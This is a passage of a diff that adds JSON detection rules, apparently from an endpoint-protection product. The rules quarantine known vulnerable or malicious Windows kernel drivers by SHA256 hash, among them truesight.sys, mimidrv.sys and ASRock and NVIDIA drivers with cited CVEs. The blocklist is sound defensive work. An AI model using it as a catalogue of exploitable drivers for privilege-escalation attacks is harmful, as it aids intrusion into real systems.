+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810362Z",
+ "creation_date": "2026-03-23T11:45:31.810364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "087c53edab3309eb60f7663438c24b515818de19702a53bf0e9cf445f12133fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c0f29bd-c90e-5122-abc2-1799dba648b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455556Z",
+ "creation_date": "2026-03-23T11:45:30.455559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76af3f9fa111d694e37058606f2636430bdd378c85b94f426fbfcd6666ebe6cc",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c12a4d2-4f80-540d-aec2-20987bd9183e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824331Z",
+ "creation_date": "2026-03-23T11:45:30.824334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df276afe1f65f0705c18cf52d37f32e4a3f1ea9ff36fa5fe6012b687da2bebe1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c1398a6-613f-5df0-891c-0507517974a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499538Z",
+ "creation_date": "2026-03-23T11:45:31.499541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47f7c0b0212d3e5d881d821ab0697aa9beb29da8c67d6d513b51329594063b1c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c145121-9f67-5acd-81bb-f0c02d58b07a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984122Z",
+ "creation_date": "2026-03-23T11:45:29.984124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8aba8df5a1aa3f14551047c8c9dea2b2d5867f2ad4dec89b53530c96a13c84db",
+ "comment": "Vulnerable Kernel Driver (aka CupFixerx64.sys) [https://www.loldrivers.io/drivers/c98af16e-197f-4e66-bf94-14646bde32dd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c151a64-55ea-5ea3-a72a-55293b1aefd5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467590Z",
+ "creation_date": "2026-03-23T11:45:30.467593Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "028011ae3cd1d972b7c46fc8261f583d1fe5dedcef02ee63ee532b3668bfdc25",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c17e236-a3b6-580e-97db-61400a65850c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613563Z",
+ "creation_date": "2026-03-23T11:45:29.613565Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac7b3c3b74e6e282c7f50c17a6213b81b181f779cd7c0c78e3cb426c427a98db",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c319db3-903c-5dfd-9650-924206544b1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814494Z",
+ "creation_date": "2026-03-23T11:45:31.814497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "530cdaa6c56ba94938ea82a4a2e91b8dfcd5a7a1faac320600cc9f43adf10b3f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c4f5941-bb5e-5617-9618-a728eb262939",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816865Z",
+ "creation_date": "2026-03-23T11:45:30.816867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816886Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05c15a75d183301382a082f6d76bf3ab4c520bf158abca4433d9881134461686",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c5202dd-ebad-56d6-8a6b-e46afc303089",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477581Z",
+ "creation_date": "2026-03-23T11:45:31.477584Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d160f1e1eb14430974e27e865d58ef410d987a1142409f24f7dfb6bb61ebe03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c630abb-6e00-5531-a584-7e661688169e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490138Z",
+ "creation_date": "2026-03-23T11:45:31.490140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bc1c957ed632fd4e19c3f39f1e3e73fc9f34e363077329fceaecb36892c6ce3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c6ed26d-3e6b-5f4f-9a34-1cb50f6b1912",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489501Z",
+ "creation_date": "2026-03-23T11:45:31.489504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbcaf228879ba5effe4b49da888e0cf197bcfbce92ecd297c5f756353fd29f40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c87dc52-db4a-5193-a8fe-8c5af28185cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154519Z",
+ "creation_date": "2026-03-23T11:45:31.154521Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154526Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2b1e51eaf700909df86108f021961970ec24721b66d3248f64be7f15fc9482f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c8d35fd-cc3f-5564-947f-73cef799bb13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481615Z",
+ "creation_date": "2026-03-23T11:45:31.481619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1ebac06f8f63c3afd1428849b68ca03567b14fddf79f4cb91561b51a89c025b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c8daf89-46c4-542d-b6ce-097fa65b32c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828842Z",
+ "creation_date": "2026-03-23T11:45:30.828844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c0744d29a4d956fd34a41e804fe486250ecac8da878fc110ef219d6bcbf294c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ca41381-7c6d-5b18-9901-76b7c1122871",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825335Z",
+ "creation_date": "2026-03-23T11:45:31.825339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95557ce0e6600ff4883577ff18c58379f1276db52aed9af01a6588131e3a5167",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cabdaf0-8fea-5866-b62f-b75bcaedc76b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980254Z",
+ "creation_date": "2026-03-23T11:45:29.980256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0507d893e3fd2917c81c1dc13ccb22ae5402ab6ca9fb8d89485010838050d08d",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cb25458-98d1-5b57-9128-f763d166c1e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817286Z",
+ "creation_date": "2026-03-23T11:45:30.817288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fcb7131bc940fc01dc5444a1ae18bf299e92c3155a783629007cf2a61cda9db",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cbcc79e-794a-5b98-856a-1617552d40b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140294Z",
+ "creation_date": "2026-03-23T11:45:31.140297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140305Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c712475ca6730e1c1251e30cc137391fae733cc316bb4e09dc9d8cc0943b285",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cc47fbe-2ec2-515f-94fc-36e53e2a8cc9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618497Z",
+ "creation_date": "2026-03-23T11:45:29.618499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618504Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "372c6118541efaa800bcba6e0c1780f9beb8cab6f2176bcc5fe3664ea19379e4",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cd0e340-f49f-587b-89a8-687ad19416ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617989Z",
+ "creation_date": "2026-03-23T11:45:29.617991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b2ad08123e8ed2516548240cfcdf5eefd89293f31070a6cd3949ee1b66fed14",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cd6bd37-264c-5f89-80ad-25bb294db2fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821672Z",
+ "creation_date": "2026-03-23T11:45:31.821674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ce73093c56112af457da031aae34076a633184258a0a0957e28fbb0e7791c6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ce5f9c5-527d-54b3-aec2-cd4ede2f5e37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
